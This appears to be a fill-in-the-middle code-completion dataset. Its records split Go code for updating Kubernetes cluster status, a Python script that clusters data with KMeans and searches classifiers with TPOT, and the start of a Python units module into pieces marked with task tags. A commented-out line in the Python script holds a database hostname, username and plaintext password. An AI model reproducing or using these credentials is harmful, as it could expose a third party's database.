nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
} | random_line_split |
|
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) | (ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
}
| EnsureCreated | identifier_name |
kmeans_to_classifier_main.py | from data_treatment import load_data_yf,data_clean,seperate_label,data_seperate,load_data_new,data_transform_new,plot_eda,data_clean,feature_extend
from models import rf_mdoel,gbdt_mdoel,xgb_model,cat_boost_model,lgb_model,get_stacking
from sklearn.metrics import make_scorer
from sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier
from model_evalu import evalution_model,plot_importance
import numpy as npr
from xgboost import XGBClassifier
from sklearn.metrics import precision_score,f1_score,recall_score
import warnings
import pandas as pd
import numpy as np
import pymysql
from catboost import CatBoostClassifier,CatBoostRegressor,Pool
if __name__ == '__main__':
warnings.filterwarnings('ignore')
#加载数据
sql = "select * from bidata.trail_boost"
df = load_data_new(sql, filename="df_201810166.csv")
#加载新数据
# sql_new = "select DISTINCT teacher_id,history_trail_cnt,history_trail_suc_cnt_bycontract,history_trail_suc_cnt_bystudent,first_tkod_tifl_count from trail_boost"
# conn = pymysql.connect(host="rm-2ze974348wa9e1ev3uo.mysql.rds.aliyuncs.com", port=3306, user="yanfei_read",
# passwd="xMbquuHi98JyfiF1", db="bidata", charset="utf8")
# df_new = pd.read_sql(sql_new, conn)
# conn.close()
#
# df = pd.merge(df,df_new,how="left",on=["teacher_id"])
label_by_contract = "is_sucess_by_contract"
label_by_pay = "is_sucess_by_pay"
label_by_official_course = "is_sucess_by_official_course"
labels = label_by_contract
select_columns = [
# 'student_no',
'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
'subject_ids',
'school_background',
'student_sex_fillna',
'teacher_sex',
# "lesson_asigned_way",
'coil_in',
'know_origin',
"is_login",
#
'history_rate_bystudent',
'history_trail_suc_cnt_bycontract',
'history_trail_suc_cnt_bystudent',
'l3m_sucess_rate',
'trial_course_rate',
'l3m_student_relative',
'score_mean',
'daily_trail_count',
'teacher_requirements_times',
'sucess_rate',
'l3m_trail_not_best_rate',
'l3m_teacher_trail_not_best_cnt',
'month',
'l3m_trial_course_rate',
'l3m_hw_submit_rate',
'taught_trial_course_count',
'first_tkod_tifl_count',
'history_trail_cnt',
'teacher_after_4d_lp_cnt',
'l3m_hw_correct_rate',
# #
'teacher_fresh_hour',
"effectiveCommunicationCount",
"score_min",
'learning_target_lenght',
"teacher_staff_age_byopt",
'self_evaluation_length',
'l3m_avg_has_qz_lc',
'l3m_avg_prop_has_qz_lc',
'l3m_has_qz_lc',
'l3m_prop_has_qz_lc',
labels
]
print(len(df))
#数据预处理
df_train, df_btest= data_clean(df, min_date="2018-01-01", mid_date="2018-06-15", max_date="2018-06-30",label=labels)
df_train = df_train[select_columns]
df_btest = df_btest[select_columns]
print(len(df_btest))
print(df_train.columns)
print('正/负', str(len(df_train[df_train[labels] == 1])) + '/' + str(len(df_train[df_train[labels] == 0])))
t = len(df_train[df_train[labels] == 0]) / len(df_train[df_train[labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t,v)
# 特征筛选
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
#划分训练测试集
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# 划分label
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
#sample_weigth
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
#k_means划分类别
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0) # 构造聚类器
estimator.fit(x_train.drop(labels, axis=1)) # 聚类
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
# 类似class_weight
"subsample": [0.85], # 取多少样本,放过拟合
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
'learning_rate ': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
|
for i in range(5):
tpo = TPOTClassifier(generations=10, verbosity=2, population_size=150,
scoring='f1', n_jobs=-1, config_dict=tpot_config,
mutation_rate=0.8, crossover_rate=0.2)
x_train_x = np.array(x_train[x_train["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
x_test_x = np.array(x_test[x_test["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
df_btest_x = df_btest[df_btest["chunk_label"] == i].drop("chunk_label",
axis=1)
y_train_x = np.array(x_train[labels])
# clf = tpo.fit(x_train_x, y_train_x)
#
# print(len(df_btest_x))
# print("=========modelu", i, "============")
# evalution_model(clf, df_btest_x.drop("is_sucess_by_contract", axis=1),
# df_btest_x["is_sucess_by_contract"])
#
#
# evalution_model(clf, df_btest.drop("is_sucess_by_contract", axis=1), df_btest["is_sucess_by_contract"])
#
#
# # | random_line_split |
|
kmeans_to_classifier_main.py | from data_treatment import load_data_yf,data_clean,seperate_label,data_seperate,load_data_new,data_transform_new,plot_eda,data_clean,feature_extend
from models import rf_mdoel,gbdt_mdoel,xgb_model,cat_boost_model,lgb_model,get_stacking
from sklearn.metrics import make_scorer
from sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier
from model_evalu import evalution_model,plot_importance
import numpy as npr
from xgboost import XGBClassifier
from sklearn.metrics import precision_score,f1_score,recall_score
import warnings
import pandas as pd
import numpy as np
import pymysql
from catboost import CatBoostClassifier,CatBoostRegressor,Pool
if __name__ == '__main__':
warnings.filterwarnings('ignore')
#加载数据
sql = "select * from bidata.trail_boost"
df = load_data_new(sql, filename="df_201810166.csv")
#加载新数据
# sql_new = "select DISTINCT teacher_id,history_trail_cnt,history_trail_suc_cnt_bycontract,history_trail_suc_cnt_bystudent,first_tkod_tifl_count from trail_boost"
# conn = pymysql.connect(host="rm-2ze974348wa9e1ev3uo.mysql.rds.aliyuncs.com", port=3306, user="yanfei_read",
# passwd="xMbquuHi98JyfiF1", db="bidata", charset="utf8")
# df_new = pd.read_sql(sql_new, conn)
# conn.close()
#
# df = pd.merge(df,df_new,how="left",on=["teacher_id"])
label_by_contract = "is_sucess_by_contract"
label_by_pay = "is_sucess_by_pay"
label_by_official_course = "is_sucess_by_official_course"
labels = label_by_contract
select_columns = [
# 'student_no',
'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
'subject_ids',
'school_background',
'student_sex_fillna',
'teacher_sex',
# "lesson_asigned_way",
'coil_in',
'know_origin',
"is_login",
#
'history_rate_bystudent',
'history_trail_suc_cnt_bycontract',
'history_trail_suc_cnt_bystudent',
'l3m_sucess_rate',
'trial_course_rate',
'l3m_student_relative',
'score_mean',
'daily_trail_count',
'teacher_requirements_times',
'sucess_rate',
'l3m_trail_not_best_rate',
'l3m_teacher_trail_not_best_cnt',
'month',
'l3m_trial_course_rate',
'l3m_hw_submit_rate',
'taught_trial_course_count',
'first_tkod_tifl_count',
'history_trail_cnt',
'teacher_after_4d_lp_cnt',
'l3m_hw_correct_rate',
# #
'teacher_fresh_hour',
"effectiveCommunicationCount",
"score_min",
'learning_target_lenght',
"teacher_staff_age_byopt",
'self_evaluation_length',
'l3m_avg_has_qz_lc',
'l3m_avg_prop_has_qz_lc',
'l3m_has_qz_lc',
'l3m_prop_has_qz_lc',
labels
]
print(len(df))
#数据预处理
df_train, df_btest= data_clean(df, min_date="2018-01-01", mid_date="2018-06-15", max_date="2018-06-30",label=labels)
df_train = df_train[select_columns]
df_btest = df_btest[select_columns]
print(len(df_btest))
print(df_train.columns)
print('正/负', str(len(df_train[df_train[labels] == 1])) + '/' + str(len(df_train[df_train[labels] == 0])))
t = len(df_train[df_train[labels] == 0]) / len(df_train[df_train[labels] == 1])
v = len(df_btest[df_btest[labels] == 0]) / len(df_btest[df_btest[labels] == 1])
print(t,v)
# 特征筛选
# from sklearn.feature_selection import RFECV
#
# dt_score = make_scorer(precision_score, pos_label=1)
# rf = RandomForestClassifier(n_estimators=24, criterion='gini', max_depth=7,
# random_state=5, class_weight={1: t},
# n_jobs=-1)
# selector = RFECV(rf, step=1, cv=5, scoring=dt_score, n_jobs=-1)
# selector = selector.fit(df_train.drop([labels], axis=1), df_train[labels])
#
# print("查看哪些特征是被选择的", selector.support_) # 查看哪些特征是被选择的
# print("被筛选的特征数量", selector.n_features_)
# print("特征排名", selector.ranking_)
# columns = pd.DataFrame(df_train.drop([labels], axis=1).columns).rename(columns={0: "features"})
# sl = pd.DataFrame(selector.support_).rename(columns={0: "result_rfecv"})
# sk = pd.concat([columns, sl], axis=1)
# sk_select = sk[sk['result_rfecv'] == True]
# sm = list(sk_select["features"])
# sm.append(labels)
#
# df_train = df_train[sm]
# df_btest = df_btest[sm]
# print(len(df_btest))
#划分训练测试集
X_train_tra, X_test_tra, df_btest= data_seperate(df_train,df_btest, size=0.3, cri=None,undeal_column=[
# 'is_first_trail',
# 'grade_rank',
# 'teacher_id',
# 'student_province',
'student_province_byphone',
# 'class_rank_fillna',
'grade_subject',
'student_grade',
'student_city_class_detail',
'know_origin_discretize',
# 'coil_in_discretize',
# #
# 'subject_ids',
# 'school_background',
# 'student_sex_fillna',
# 'teacher_sex',
'coil_in',
'know_origin',
# "is_login",
# "lesson_asigned_way",
labels])
# 划分label
# x_train, y_train = seperate_label(X_train_tra, label=labels)
# x_test, y_test = seperate_label(X_test_tra, label=labels)
x_train = X_train_tra.copy()
x_test = X_test_tra.copy()
#sample_weigth
y_train = x_train[labels]
from collections import Counter
cout = Counter(y_train)
tt = cout[0] / cout[1]
sample_weigh = np.where(y_train == 0, 1, tt)
#k_means划分类别
from sklearn.cluster import KMeans
estimator = KMeans(n_clusters=5, random_state=0) # 构造聚类器
estimator.fit(x_train.drop(labels, axis=1)) # 聚类
train_label = estimator.predict(x_train.drop(labels, axis=1))
test_label = estimator.predict(x_test.drop(labels, axis=1))
btest_label = estimator.predict(df_btest.drop("is_sucess_by_contract", axis=1))
x_train["chunk_label"] = train_label
x_test["chunk_label"] = test_label
df_btest["chunk_label"] = btest_label
# df_btest["count"] = 1
# ss = pd.pivot_table(df_btest, index=["is_sucess_by_contract"], columns=["chunk_label"], values=["count"], aggfunc=np.sum)
#rf0
# clf = RandomForestClassifier(n_estimators=21, max_depth=5, max_features=9, random_state=5, n_jobs=-1,criterion="gini")
# clf = GradientBoostingClassifier(loss="deviance", learning_rate=0.1,
# n_estimators=20, subsample=1.0,max_features=8,
# criterion="mse",warm_start=True,
# min_samples_split=2, min_samples_leaf=1,
# max_depth=5, random_state=5)
# clf = XGBClassifier(
# max_depth=6,
# min_child_weight=1,
# learning_rate=0.1,
# n_estimators=20,
# silent=True,
# objective='binary:logistic',
# gamma=0,
# max_delta_step=0,
# subsample=1,
# colsample_bytree=1,
# colsample_bylevel=1,
# reg_alpha=0,
# reg_lambda=0,
# # scale_pos_weight=3.687,
# seed=1,
# missing=None,
# random_state=5)
# clf= CatBoostClassifier(learning_rate=0.01, depth=9, l2_leaf_reg=0.1, loss_function='CrossEntropy',
# # class_weights=[1, 2.8],
# thread_count=24, random_state=5)
from tpot import TPOTClassifier
tpot_config = {
'sklearn.ensemble.RandomForestClassifier':
{
'criterion': ['gini'],
'n_estimators': range(20, 25),
'max_depth': range(5, 10),
'max_features': range(5, 10),
'class_weight': [{1: i} for i in np.linspace(tt - 1, tt + 1, 3)]
},
'sklearn.ensemble.GradientBoostingClassifier': {
"loss": ["deviance"], # GBDT parameters
"learning_rate": [0.01, 0.1],
"n_estimators": range(20, 25),
"subsample": [0.5, 0.8, 1.0],
"criterion": ["friedman_mse", "mse"],
"max_features": range(5, 10), # DT parameters
"max_depth": range(5, 10),
"warm_start": [True]},
'xgboost.XGBClassifier': {
"learning_rate": [0.1, 0.01],
"n_estimators": range(20, 25),
"scale_pos_weight": [i for i in np.linspace(tt - 1, tt + 1, 3)],
# 类似class_weight
"subsample": [0.85], # 取多少样本,放过拟合
"min_child_weight": range(6, 7),
"max_depth": range(3, 8),
},
'catboost.CatBoostClassifier':
{
"learning_rate": [0.01],
"loss_function": ['CrossEntropy', 'Logloss'], # 取多少样本,放过拟合
"depth": range(9, 10),
"class_weights": [[1, i] for i in
np.linspace(tt - 1, tt + 1, 3)]},
'lightgbm.LGBMModel': {
'categorical_feature': ['auto'],
# 'weight': sample_weigh,
'boosting_type': ['gbdt', 'dart', 'rf'],
'n_estimators': range(20, 25),
'learning_rate ': [0.1, 0.01],
'subsample_freq': [0.5, 0.8, 1],
'colsample_bytree': [0.5, 0.8, 1],
'num_leaves': range(28, 33),
}
}
for i in range(5):
tpo = TPOTClassifier(generations=10, verbosity=2, population_size=150,
scoring='f1', n_jobs=-1, config_dict=tpot_config,
mutation_rate | =0.8, crossover_rate=0.2)
x_train_x = np.array(x_train[x_train["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
x_test_x = np.array(x_test[x_test["chunk_label"] == i].drop(["chunk_label", labels],
axis=1))
df_btest_x = df_btest[df_btest["chunk_label"] == i].drop("chunk_label",
axis=1)
y_train_x = np.array(x_train[labels])
# clf = tpo.fit(x_train_x, y_train_x)
#
# print(len(df_btest_x))
# print("=========modelu", i, "============")
# evalution_model(clf, df_btest_x.drop("is_sucess_by_contract", axis=1),
# df_btest_x["is_sucess_by_contract"])
#
#
# evalution_model(clf, df_btest.drop("is_sucess_by_contract", axis=1), df_btest["is_sucess_by_contract"])
#
#
# #
| conditional_block |
|
units.py | # units.py
# Unit classes/functions for hammer_vlsi.
#
# See LICENSE for licence details.
from abc import abstractmethod
import sys
try:
from abc import ABC # pylint: disable=ungrouped-imports
except ImportError:
if sys.version_info.major == 3 and sys.version_info.minor < 4:
# Python compatibility: 3.3
# Python 3.3 and below don't have abc.ABC
import abc # pylint: disable=ungrouped-imports
ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore
from typing import Optional, TypeVar
from hammer.utils import get_or_else
_TT = TypeVar('_TT', bound='ValueWithUnit')
class ValueWithUnit(ABC):
"""Represents some particular value that has units (e.g. "10 ns", "2000 um", "25 C", etc).
"""
# From https://stackoverflow.com/a/10970888
_prefix_table = {
'y': 1e-24, # yocto
'z': 1e-21, # zepto
'a': 1e-18, # atto
'f': 1e-15, # femto
'p': 1e-12, # pico
'n': 1e-9, # nano
'u': 1e-6, # micro
'm': 1e-3, # milli
'c': 1e-2, # centi
'd': 1e-1, # deci
'': 1, # <no prefix>
'k': 1e3, # kilo
'M': 1e6, # mega
'G': 1e9, # giga
'T': 1e12, # tera
'P': 1e15, # peta
'E': 1e18, # exa
'Z': 1e21, # zetta
'Y': 1e24, # yotta
}
@property
@abstractmethod
def unit(self) -> str:
"""Get the base unit for values (e.g. "s", "m", "V", etc).
Meant to be overridden by subclasses."""
@property
@abstractmethod
def unit_type(self) -> str:
"""Get the base unit type for values. (e.g. for "s", this would be "time")
Meant to be overridden by subclasses."""
@property
@abstractmethod
def default_prefix(self) -> str:
"""Get the default prefix for values.
(e.g. for time, specifying "n" would mean "0.25" would be interpreted as "0.25 ns".)
Meant to be overridden by subclasses."""
def __init__(self, value: str, prefix: Optional[str] = None) -> None:
"""
Create a value from parsing the given string.
:param value: Value encoded in the given string.
:param prefix: If value does not have a prefix (e.g. "0.25"), then use
the given prefix, or the default prefix defined by the
class if one is not specified.
"""
import re
default_prefix = get_or_else(prefix, self.default_prefix)
regex = r"^(-?[\d.]+) *(.*){}$".format(re.escape(self.unit))
match = re.search(regex, value)
if match is None:
try:
num = str(float(value))
